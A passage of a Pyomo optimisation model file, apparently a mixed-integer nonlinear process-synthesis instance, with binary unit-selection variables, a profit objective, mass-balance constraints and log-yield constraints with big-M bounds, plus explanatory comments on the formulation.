m.b505 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b506 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b507 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b508 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b509 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b510 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b511 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b512 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b513 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b514 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b515 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b516 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b517 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b518 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b519 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b520 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b521 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b522 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b523 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b524 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b525 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b526 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b527 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b528 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b529 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b530 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b531 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b532 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b533 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b534 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b535 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b536 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b537 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b538 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b539 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b540 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b541 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b542 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b543 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b544 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b545 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b546 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b547 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b548 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b549 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b550 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b551 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b552 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b553 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b554 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b555 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b556 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b557 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b558 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b559 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b560 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b561 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b562 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b563 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b564 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b565 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b566 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b567 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b568 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b569 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b570 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b571 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b572 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b573 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b574 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b575 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b576 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b577 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b578 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b579 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b580 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b581 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b582 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b583 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b584 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b585 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b586 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b587 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b588 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b589 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b590 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b591 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b592 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b593 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b594 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b595 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b596 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b597 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b598 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b599 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b600 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b601 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b602 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b603 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b604 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b605 = Var(within=Binary,bounds=(0,1),initialize=0)
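# Objective (interpretation inferred from the sign pattern): maximize the revenue-like
# terms with positive coefficients (x86-x89, x158-x165, x206-x221) net of the flow
# costs with negative coefficients and the fixed charges on the b546-b605 binaries.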
m.obj = Objective(expr= - m.x62 - m.x63 - m.x64 - m.x65 + 5*m.x86 + 10*m.x87 + 5*m.x88 + 10*m.x89 - 2*m.x106 - m.x107
- 2*m.x108 - m.x109 + 500*m.x158 + 600*m.x159 + 350*m.x160 + 400*m.x161 + 350*m.x162
+ 400*m.x163 + 450*m.x164 + 400*m.x165 - 10*m.x174 - 5*m.x175 - 5*m.x176 - 10*m.x177 - 5*m.x178
- 5*m.x179 - 5*m.x180 - 10*m.x181 + 180*m.x206 + 130*m.x207 + 215*m.x208 + 210*m.x209
+ 110*m.x210 + 120*m.x211 + 125*m.x212 + 130*m.x213 + 110*m.x214 + 130*m.x215 + 140*m.x216
+ 140*m.x217 + 280*m.x218 + 290*m.x219 + 220*m.x220 + 200*m.x221 - 5*m.b546 - 4*m.b547
- 6*m.b548 - 3*m.b549 - 8*m.b550 - 7*m.b551 - 6*m.b552 - 5*m.b553 - 6*m.b554 - 9*m.b555
- 4*m.b556 - 3*m.b557 - 10*m.b558 - 9*m.b559 - 5*m.b560 - 6*m.b561 - 6*m.b562 - 10*m.b563
- 6*m.b564 - 9*m.b565 - 7*m.b566 - 7*m.b567 - 4*m.b568 - 2*m.b569 - 4*m.b570 - 3*m.b571
- 2*m.b572 - 8*m.b573 - 5*m.b574 - 6*m.b575 - 7*m.b576 - 4*m.b577 - 2*m.b578 - 5*m.b579
- 2*m.b580 - 6*m.b581 - 4*m.b582 - 7*m.b583 - 4*m.b584 - 7*m.b585 - 3*m.b586 - 9*m.b587
- 3*m.b588 - 6*m.b589 - 7*m.b590 - 2*m.b591 - 9*m.b592 - 6*m.b593 - 3*m.b594 - m.b595 - 9*m.b596
- 10*m.b597 - 2*m.b598 - 6*m.b599 - 3*m.b600 - 7*m.b601 - 4*m.b602 - 8*m.b603 - m.b604
- 4*m.b605, sense=maximize)
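# c2-c41 look like linear mass balances: each total stream equals the sum of the
# substreams it is split into (or mixed from), e.g. x62 = x66 + x70 in c2.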
m.c2 = Constraint(expr= m.x62 - m.x66 - m.x70 == 0)
m.c3 = Constraint(expr= m.x63 - m.x67 - m.x71 == 0)
m.c4 = Constraint(expr= m.x64 - m.x68 - m.x72 == 0)
m.c5 = Constraint(expr= m.x65 - m.x69 - m.x73 == 0)
m.c6 = Constraint(expr= - m.x74 - m.x78 + m.x82 == 0)
m.c7 = Constraint(expr= - m.x75 - m.x79 + m.x83 == 0)
m.c8 = Constraint(expr= - m.x76 - m.x80 + m.x84 == 0)
m.c9 = Constraint(expr= - m.x77 - m.x81 + m.x85 == 0)
m.c10 = Constraint(expr= m.x82 - m.x86 - m.x90 == 0)
m.c11 = Constraint(expr= m.x83 - m.x87 - m.x91 == 0)
m.c12 = Constraint(expr= m.x84 - m.x88 - m.x92 == 0)
m.c13 = Constraint(expr= m.x85 - m.x89 - m.x93 == 0)
m.c14 = Constraint(expr= m.x90 - m.x94 - m.x98 - m.x102 == 0)
m.c15 = Constraint(expr= m.x91 - m.x95 - m.x99 - m.x103 == 0)
m.c16 = Constraint(expr= m.x92 - m.x96 - m.x100 - m.x104 == 0)
m.c17 = Constraint(expr= m.x93 - m.x97 - m.x101 - m.x105 == 0)
m.c18 = Constraint(expr= m.x110 - m.x122 - m.x126 == 0)
m.c19 = Constraint(expr= m.x111 - m.x123 - m.x127 == 0)
m.c20 = Constraint(expr= m.x112 - m.x124 - m.x128 == 0)
m.c21 = Constraint(expr= m.x113 - m.x125 - m.x129 == 0)
m.c22 = Constraint(expr= m.x118 - m.x130 - m.x134 - m.x138 == 0)
m.c23 = Constraint(expr= m.x119 - m.x131 - m.x135 - m.x139 == 0)
m.c24 = Constraint(expr= m.x120 - m.x132 - m.x136 - m.x140 == 0)
m.c25 = Constraint(expr= m.x121 - m.x133 - m.x137 - m.x141 == 0)
m.c26 = Constraint(expr= m.x150 - m.x166 - m.x170 == 0)
m.c27 = Constraint(expr= m.x151 - m.x167 - m.x171 == 0)
m.c28 = Constraint(expr= m.x152 - m.x168 - m.x172 == 0)
m.c29 = Constraint(expr= m.x153 - m.x169 - m.x173 == 0)
m.c30 = Constraint(expr= - m.x154 - m.x178 + m.x182 == 0)
m.c31 = Constraint(expr= - m.x155 - m.x179 + m.x183 == 0)
m.c32 = Constraint(expr= - m.x156 - m.x180 + m.x184 == 0)
m.c33 = Constraint(expr= - m.x157 - m.x181 + m.x185 == 0)
m.c34 = Constraint(expr= m.x158 - m.x186 - m.x190 == 0)
m.c35 = Constraint(expr= m.x159 - m.x187 - m.x191 == 0)
m.c36 = Constraint(expr= m.x160 - m.x188 - m.x192 == 0)
m.c37 = Constraint(expr= m.x161 - m.x189 - m.x193 == 0)
m.c38 = Constraint(expr= m.x162 - m.x194 - m.x198 - m.x202 == 0)
m.c39 = Constraint(expr= m.x163 - m.x195 - m.x199 - m.x203 == 0)
m.c40 = Constraint(expr= m.x164 - m.x196 - m.x200 - m.x204 == 0)
m.c41 = Constraint(expr= m.x165 - m.x197 - m.x201 - m.x205 == 0)
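# From here on, each process unit is modelled by a repeating block (annotation added;
# the exact provenance of the formulation is not stated in the file):
#   * a concave yield relation out <= k*log(1 + in), written in the scaled form
#     (out/(0.001 + 0.999*b) - k*log(1 + in/(0.001 + 0.999*b)))*(0.001 + 0.999*b) <= 0
#     so it degenerates gracefully when the unit binary b is 0 (the 0.001 offset
#     avoids division by zero);
#   * constraints fixing the "unit off" copies of the streams to zero;
#   * variable upper bounds of the form x - U*b <= 0 and x + U*b <= U that
#     deactivate one stream copy or the other depending on b.
# This reads like a convex-hull (disaggregated-variable) reformulation of the
# unit-selection disjunctions.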
m.c42 = Constraint(expr=(m.x238/(0.001 + 0.999*m.b486) - log(1 + m.x222/(0.001 + 0.999*m.b486)))*(0.001 + 0.999*m.b486)
<= 0)
m.c43 = Constraint(expr=(m.x239/(0.001 + 0.999*m.b487) - log(1 + m.x223/(0.001 + 0.999*m.b487)))*(0.001 + 0.999*m.b487)
<= 0)
m.c44 = Constraint(expr=(m.x240/(0.001 + 0.999*m.b488) - log(1 + m.x224/(0.001 + 0.999*m.b488)))*(0.001 + 0.999*m.b488)
<= 0)
m.c45 = Constraint(expr=(m.x241/(0.001 + 0.999*m.b489) - log(1 + m.x225/(0.001 + 0.999*m.b489)))*(0.001 + 0.999*m.b489)
<= 0)
m.c46 = Constraint(expr= m.x226 == 0)
m.c47 = Constraint(expr= m.x227 == 0)
m.c48 = Constraint(expr= m.x228 == 0)
m.c49 = Constraint(expr= m.x229 == 0)
m.c50 = Constraint(expr= m.x242 == 0)
m.c51 = Constraint(expr= m.x243 == 0)
m.c52 = Constraint(expr= m.x244 == 0)
m.c53 = Constraint(expr= m.x245 == 0)
m.c54 = Constraint(expr= m.x66 - m.x222 - m.x226 == 0)
m.c55 = Constraint(expr= m.x67 - m.x223 - m.x227 == 0)
m.c56 = Constraint(expr= m.x68 - m.x224 - m.x228 == 0)
m.c57 = Constraint(expr= m.x69 - m.x225 - m.x229 == 0)
m.c58 = Constraint(expr= m.x74 - m.x238 - m.x242 == 0)
m.c59 = Constraint(expr= m.x75 - m.x239 - m.x243 == 0)
m.c60 = Constraint(expr= m.x76 - m.x240 - m.x244 == 0)
m.c61 = Constraint(expr= m.x77 - m.x241 - m.x245 == 0)
m.c62 = Constraint(expr= m.x222 - 40*m.b486 <= 0)
m.c63 = Constraint(expr= m.x223 - 40*m.b487 <= 0)
m.c64 = Constraint(expr= m.x224 - 40*m.b488 <= 0)
m.c65 = Constraint(expr= m.x225 - 40*m.b489 <= 0)
m.c66 = Constraint(expr= m.x226 + 40*m.b486 <= 40)
m.c67 = Constraint(expr= m.x227 + 40*m.b487 <= 40)
m.c68 = Constraint(expr= m.x228 + 40*m.b488 <= 40)
m.c69 = Constraint(expr= m.x229 + 40*m.b489 <= 40)
m.c70 = Constraint(expr= m.x238 - 3.71357206670431*m.b486 <= 0)
m.c71 = Constraint(expr= m.x239 - 3.71357206670431*m.b487 <= 0)
m.c72 = Constraint(expr= m.x240 - 3.71357206670431*m.b488 <= 0)
m.c73 = Constraint(expr= m.x241 - 3.71357206670431*m.b489 <= 0)
m.c74 = Constraint(expr= m.x242 + 3.71357206670431*m.b486 <= 3.71357206670431)
m.c75 = Constraint(expr= m.x243 + 3.71357206670431*m.b487 <= 3.71357206670431)
m.c76 = Constraint(expr= m.x244 + 3.71357206670431*m.b488 <= 3.71357206670431)
m.c77 = Constraint(expr= m.x245 + 3.71357206670431*m.b489 <= 3.71357206670431)
m.c78 = Constraint(expr=(m.x246/(0.001 + 0.999*m.b490) - 1.2*log(1 + m.x230/(0.001 + 0.999*m.b490)))*(0.001 + 0.999*
m.b490) <= 0)
m.c79 = Constraint(expr=(m.x247/(0.001 + 0.999*m.b491) - 1.2*log(1 + m.x231/(0.001 + 0.999*m.b491)))*(0.001 + 0.999*
m.b491) <= 0)
m.c80 = Constraint(expr=(m.x248/(0.001 + 0.999*m.b492) - 1.2*log(1 + m.x232/(0.001 + 0.999*m.b492)))*(0.001 + 0.999*
m.b492) <= 0)
m.c81 = Constraint(expr=(m.x249/(0.001 + 0.999*m.b493) - 1.2*log(1 + m.x233/(0.001 + 0.999*m.b493)))*(0.001 + 0.999*
m.b493) <= 0)
m.c82 = Constraint(expr= m.x234 == 0)
m.c83 = Constraint(expr= m.x235 == 0)
m.c84 = Constraint(expr= m.x236 == 0)
m.c85 = Constraint(expr= m.x237 == 0)
m.c86 = Constraint(expr= m.x250 == 0)
m.c87 = Constraint(expr= m.x251 == 0)
m.c88 = Constraint(expr= m.x252 == 0)
m.c89 = Constraint(expr= m.x253 == 0)
m.c90 = Constraint(expr= m.x70 - m.x230 - m.x234 == 0)
m.c91 = Constraint(expr= m.x71 - m.x231 - m.x235 == 0)
m.c92 = Constraint(expr= m.x72 - m.x232 - m.x236 == 0)
m.c93 = Constraint(expr= m.x73 - m.x233 - m.x237 == 0)
m.c94 = Constraint(expr= m.x78 - m.x246 - m.x250 == 0)
m.c95 = Constraint(expr= m.x79 - m.x247 - m.x251 == 0)
m.c96 = Constraint(expr= m.x80 - m.x248 - m.x252 == 0)
m.c97 = Constraint(expr= m.x81 - m.x249 - m.x253 == 0)
m.c98 = Constraint(expr= m.x230 - 40*m.b490 <= 0)
m.c99 = Constraint(expr= m.x231 - 40*m.b491 <= 0)
m.c100 = Constraint(expr= m.x232 - 40*m.b492 <= 0)
m.c101 = Constraint(expr= m.x233 - 40*m.b493 <= 0)
m.c102 = Constraint(expr= m.x234 + 40*m.b490 <= 40)
m.c103 = Constraint(expr= m.x235 + 40*m.b491 <= 40)
m.c104 = Constraint(expr= m.x236 + 40*m.b492 <= 40)
m.c105 = Constraint(expr= m.x237 + 40*m.b493 <= 40)
m.c106 = Constraint(expr= m.x246 - 4.45628648004517*m.b490 <= 0)
m.c107 = Constraint(expr= m.x247 - 4.45628648004517*m.b491 <= 0)
m.c108 = Constraint(expr= m.x248 - 4.45628648004517*m.b492 <= 0)
m.c109 = Constraint(expr= m.x249 - 4.45628648004517*m.b493 <= 0)
m.c110 = Constraint(expr= m.x250 + 4.45628648004517*m.b490 <= 4.45628648004517)
m.c111 = Constraint(expr= m.x251 + 4.45628648004517*m.b491 <= 4.45628648004517)
m.c112 = Constraint(expr= m.x252 + 4.45628648004517*m.b492 <= 4.45628648004517)
m.c113 = Constraint(expr= m.x253 + 4.45628648004517*m.b493 <= 4.45628648004517)
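# Some units use a fixed linear conversion instead of a log yield, e.g. c114-c117
# set x286 = 0.75*x254; the surrounding on/off machinery is otherwise the same.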
m.c114 = Constraint(expr= - 0.75*m.x254 + m.x286 == 0)
m.c115 = Constraint(expr= - 0.75*m.x255 + m.x287 == 0)
m.c116 = Constraint(expr= - 0.75*m.x256 + m.x288 == 0)
m.c117 = Constraint(expr= - 0.75*m.x257 + m.x289 == 0)
m.c118 = Constraint(expr= m.x258 == 0)
m.c119 = Constraint(expr= m.x259 == 0)
m.c120 = Constraint(expr= m.x260 == 0)
m.c121 = Constraint(expr= m.x261 == 0)
m.c122 = Constraint(expr= m.x290 == 0)
m.c123 = Constraint(expr= m.x291 == 0)
m.c124 = Constraint(expr= m.x292 == 0)
m.c125 = Constraint(expr= m.x293 == 0)
m.c126 = Constraint(expr= m.x94 - m.x254 - m.x258 == 0)
m.c127 = Constraint(expr= m.x95 - m.x255 - m.x259 == 0)
m.c128 = Constraint(expr= m.x96 - m.x256 - m.x260 == 0)
m.c129 = Constraint(expr= m.x97 - m.x257 - m.x261 == 0)
m.c130 = Constraint(expr= m.x110 - m.x286 - m.x290 == 0)
m.c131 = Constraint(expr= m.x111 - m.x287 - m.x291 == 0)
m.c132 = Constraint(expr= m.x112 - m.x288 - m.x292 == 0)
m.c133 = Constraint(expr= m.x113 - m.x289 - m.x293 == 0)
m.c134 = Constraint(expr= m.x254 - 4.45628648004517*m.b494 <= 0)
m.c135 = Constraint(expr= m.x255 - 4.45628648004517*m.b495 <= 0)
m.c136 = Constraint(expr= m.x256 - 4.45628648004517*m.b496 <= 0)
m.c137 = Constraint(expr= m.x257 - 4.45628648004517*m.b497 <= 0)
m.c138 = Constraint(expr= m.x258 + 4.45628648004517*m.b494 <= 4.45628648004517)
m.c139 = Constraint(expr= m.x259 + 4.45628648004517*m.b495 <= 4.45628648004517)
m.c140 = Constraint(expr= m.x260 + 4.45628648004517*m.b496 <= 4.45628648004517)
m.c141 = Constraint(expr= m.x261 + 4.45628648004517*m.b497 <= 4.45628648004517)
m.c142 = Constraint(expr= m.x286 - 3.34221486003388*m.b494 <= 0)
m.c143 = Constraint(expr= m.x287 - 3.34221486003388*m.b495 <= 0)
m.c144 = Constraint(expr= m.x288 - 3.34221486003388*m.b496 <= 0)
m.c145 = Constraint(expr= m.x289 - 3.34221486003388*m.b497 <= 0)
m.c146 = Constraint(expr= m.x290 + 3.34221486003388*m.b494 <= 3.34221486003388)
m.c147 = Constraint(expr= m.x291 + 3.34221486003388*m.b495 <= 3.34221486003388)
m.c148 = Constraint(expr= m.x292 + 3.34221486003388*m.b496 <= 3.34221486003388)
m.c149 = Constraint(expr= m.x293 + 3.34221486003388*m.b497 <= 3.34221486003388)
m.c150 = Constraint(expr=(m.x294/(0.001 + 0.999*m.b498) - 1.5*log(1 + m.x262/(0.001 + 0.999*m.b498)))*(0.001 + 0.999*
m.b498) <= 0)
m.c151 = Constraint(expr=(m.x295/(0.001 + 0.999*m.b499) - 1.5*log(1 + m.x263/(0.001 + 0.999*m.b499)))*(0.001 + 0.999*
m.b499) <= 0)
m.c152 = Constraint(expr=(m.x296/(0.001 + 0.999*m.b500) - 1.5*log(1 + m.x264/(0.001 + 0.999*m.b500)))*(0.001 + 0.999*
m.b500) <= 0)
m.c153 = Constraint(expr=(m.x297/(0.001 + 0.999*m.b501) - 1.5*log(1 + m.x265/(0.001 + 0.999*m.b501)))*(0.001 + 0.999*
m.b501) <= 0)
m.c154 = Constraint(expr= m.x266 == 0)
m.c155 = Constraint(expr= m.x267 == 0)
m.c156 = Constraint(expr= m.x268 == 0)
m.c157 = Constraint(expr= m.x269 == 0)
m.c158 = Constraint(expr= m.x302 == 0)
m.c159 = Constraint(expr= m.x303 == 0)
m.c160 = Constraint(expr= m.x304 == 0)
m.c161 = Constraint(expr= m.x305 == 0)
m.c162 = Constraint(expr= m.x98 - m.x262 - m.x266 == 0)
m.c163 = Constraint(expr= m.x99 - m.x263 - m.x267 == 0)
m.c164 = Constraint(expr= m.x100 - m.x264 - m.x268 == 0)
m.c165 = Constraint(expr= m.x101 - m.x265 - m.x269 == 0)
m.c166 = Constraint(expr= m.x114 - m.x294 - m.x302 == 0)
m.c167 = Constraint(expr= m.x115 - m.x295 - m.x303 == 0)
m.c168 = Constraint(expr= m.x116 - m.x296 - m.x304 == 0)
m.c169 = Constraint(expr= m.x117 - m.x297 - m.x305 == 0)
m.c170 = Constraint(expr= m.x262 - 4.45628648004517*m.b498 <= 0)
m.c171 = Constraint(expr= m.x263 - 4.45628648004517*m.b499 <= 0)
m.c172 = Constraint(expr= m.x264 - 4.45628648004517*m.b500 <= 0)
m.c173 = Constraint(expr= m.x265 - 4.45628648004517*m.b501 <= 0)
m.c174 = Constraint(expr= m.x266 + 4.45628648004517*m.b498 <= 4.45628648004517)
m.c175 = Constraint(expr= m.x267 + 4.45628648004517*m.b499 <= 4.45628648004517)
m.c176 = Constraint(expr= m.x268 + 4.45628648004517*m.b500 <= 4.45628648004517)
m.c177 = Constraint(expr= m.x269 + 4.45628648004517*m.b501 <= 4.45628648004517)
m.c178 = Constraint(expr= m.x294 - 2.54515263975353*m.b498 <= 0)
m.c179 = Constraint(expr= m.x295 - 2.54515263975353*m.b499 <= 0)
m.c180 = Constraint(expr= m.x296 - 2.54515263975353*m.b500 <= 0)
m.c181 = Constraint(expr= m.x297 - 2.54515263975353*m.b501 <= 0)
m.c182 = Constraint(expr= m.x302 + 2.54515263975353*m.b498 <= 2.54515263975353)
m.c183 = Constraint(expr= m.x303 + 2.54515263975353*m.b499 <= 2.54515263975353)
m.c184 = Constraint(expr= m.x304 + 2.54515263975353*m.b500 <= 2.54515263975353)
m.c185 = Constraint(expr= m.x305 + 2.54515263975353*m.b501 <= 2.54515263975353)
m.c186 = Constraint(expr= - m.x270 + m.x310 == 0)
m.c187 = Constraint(expr= - m.x271 + m.x311 == 0)
m.c188 = Constraint(expr= - m.x272 + m.x312 == 0)
m.c189 = Constraint(expr= - m.x273 + m.x313 == 0)
m.c190 = Constraint(expr= - 0.5*m.x278 + m.x310 == 0)
m.c191 = Constraint(expr= - 0.5*m.x279 + m.x311 == 0)
m.c192 = Constraint(expr= - 0.5*m.x280 + m.x312 == 0)
m.c193 = Constraint(expr= - 0.5*m.x281 + m.x313 == 0)
m.c194 = Constraint(expr= m.x274 == 0)
m.c195 = Constraint(expr= m.x275 == 0)
m.c196 = Constraint(expr= m.x276 == 0)
m.c197 = Constraint(expr= m.x277 == 0)
m.c198 = Constraint(expr= m.x282 == 0)
m.c199 = Constraint(expr= m.x283 == 0)
m.c200 = Constraint(expr= m.x284 == 0)
m.c201 = Constraint(expr= m.x285 == 0)
m.c202 = Constraint(expr= m.x314 == 0)
m.c203 = Constraint(expr= m.x315 == 0)
m.c204 = Constraint(expr= m.x316 == 0)
m.c205 = Constraint(expr= m.x317 == 0)
m.c206 = Constraint(expr= m.x102 - m.x270 - m.x274 == 0)
m.c207 = Constraint(expr= m.x103 - m.x271 - m.x275 == 0)
m.c208 = Constraint(expr= m.x104 - m.x272 - m.x276 == 0)
m.c209 = Constraint(expr= m.x105 - m.x273 - m.x277 == 0)
m.c210 = Constraint(expr= m.x106 - m.x278 - m.x282 == 0)
m.c211 = Constraint(expr= m.x107 - m.x279 - m.x283 == 0)
m.c212 = Constraint(expr= m.x108 - m.x280 - m.x284 == 0)
m.c213 = Constraint(expr= m.x109 - m.x281 - m.x285 == 0)
m.c214 = Constraint(expr= m.x118 - m.x310 - m.x314 == 0)
m.c215 = Constraint(expr= m.x119 - m.x311 - m.x315 == 0)
m.c216 = Constraint(expr= m.x120 - m.x312 - m.x316 == 0)
m.c217 = Constraint(expr= m.x121 - m.x313 - m.x317 == 0)
m.c218 = Constraint(expr= m.x270 - 4.45628648004517*m.b502 <= 0)
m.c219 = Constraint(expr= m.x271 - 4.45628648004517*m.b503 <= 0)
m.c220 = Constraint(expr= m.x272 - 4.45628648004517*m.b504 <= 0)
m.c221 = Constraint(expr= m.x273 - 4.45628648004517*m.b505 <= 0)
m.c222 = Constraint(expr= m.x274 + 4.45628648004517*m.b502 <= 4.45628648004517)
m.c223 = Constraint(expr= m.x275 + 4.45628648004517*m.b503 <= 4.45628648004517)
m.c224 = Constraint(expr= m.x276 + 4.45628648004517*m.b504 <= 4.45628648004517)
m.c225 = Constraint(expr= m.x277 + 4.45628648004517*m.b505 <= 4.45628648004517)
m.c226 = Constraint(expr= m.x278 - 30*m.b502 <= 0)
m.c227 = Constraint(expr= m.x279 - 30*m.b503 <= 0)
m.c228 = Constraint(expr= m.x280 - 30*m.b504 <= 0)
m.c229 = Constraint(expr= m.x281 - 30*m.b505 <= 0)
m.c230 = Constraint(expr= m.x282 + 30*m.b502 <= 30)
m.c231 = Constraint(expr= m.x283 + 30*m.b503 <= 30)
m.c232 = Constraint(expr= m.x284 + 30*m.b504 <= 30)
m.c233 = Constraint(expr= m.x285 + 30*m.b505 <= 30)
m.c234 = Constraint(expr= m.x310 - 15*m.b502 <= 0)
m.c235 = Constraint(expr= m.x311 - 15*m.b503 <= 0)
m.c236 = Constraint(expr= m.x312 - 15*m.b504 <= 0)
m.c237 = Constraint(expr= m.x313 - 15*m.b505 <= 0)
m.c238 = Constraint(expr= m.x314 + 15*m.b502 <= 15)
m.c239 = Constraint(expr= m.x315 + 15*m.b503 <= 15)
m.c240 = Constraint(expr= m.x316 + 15*m.b504 <= 15)
m.c241 = Constraint(expr= m.x317 + 15*m.b505 <= 15)
m.c242 = Constraint(expr=(m.x358/(0.001 + 0.999*m.b506) - 1.25*log(1 + m.x318/(0.001 + 0.999*m.b506)))*(0.001 + 0.999*
m.b506) <= 0)
m.c243 = Constraint(expr=(m.x359/(0.001 + 0.999*m.b507) - 1.25*log(1 + m.x319/(0.001 + 0.999*m.b507)))*(0.001 + 0.999*
m.b507) <= 0)
m.c244 = Constraint(expr=(m.x360/(0.001 + 0.999*m.b508) - 1.25*log(1 + m.x320/(0.001 + 0.999*m.b508)))*(0.001 + 0.999*
m.b508) <= 0)
m.c245 = Constraint(expr=(m.x361/(0.001 + 0.999*m.b509) - 1.25*log(1 + m.x321/(0.001 + 0.999*m.b509)))*(0.001 + 0.999*
m.b509) <= 0)
m.c246 = Constraint(expr= m.x322 == 0)
m.c247 = Constraint(expr= m.x323 == 0)
m.c248 = Constraint(expr= m.x324 == 0)
m.c249 = Constraint(expr= m.x325 == 0)
m.c250 = Constraint(expr= m.x366 == 0)
m.c251 = Constraint(expr= m.x367 == 0)
m.c252 = Constraint(expr= m.x368 == 0)
m.c253 = Constraint(expr= m.x369 == 0)
m.c254 = Constraint(expr= m.x122 - m.x318 - m.x322 == 0)
m.c255 = Constraint(expr= m.x123 - m.x319 - m.x323 == 0)
m.c256 = Constraint(expr= m.x124 - m.x320 - m.x324 == 0)
m.c257 = Constraint(expr= m.x125 - m.x321 - m.x325 == 0)
m.c258 = Constraint(expr= m.x142 - m.x358 - m.x366 == 0)
m.c259 = Constraint(expr= m.x143 - m.x359 - m.x367 == 0)
m.c260 = Constraint(expr= m.x144 - m.x360 - m.x368 == 0)
m.c261 = Constraint(expr= m.x145 - m.x361 - m.x369 == 0)
m.c262 = Constraint(expr= m.x318 - 3.34221486003388*m.b506 <= 0)
m.c263 = Constraint(expr= m.x319 - 3.34221486003388*m.b507 <= 0)
m.c264 = Constraint(expr= m.x320 - 3.34221486003388*m.b508 <= 0)
m.c265 = Constraint(expr= m.x321 - 3.34221486003388*m.b509 <= 0)
m.c266 = Constraint(expr= m.x322 + 3.34221486003388*m.b506 <= 3.34221486003388)
m.c267 = Constraint(expr= m.x323 + 3.34221486003388*m.b507 <= 3.34221486003388)
m.c268 = Constraint(expr= m.x324 + 3.34221486003388*m.b508 <= 3.34221486003388)
m.c269 = Constraint(expr= m.x325 + 3.34221486003388*m.b509 <= 3.34221486003388)
m.c270 = Constraint(expr= m.x358 - 1.83548069293539*m.b506 <= 0)
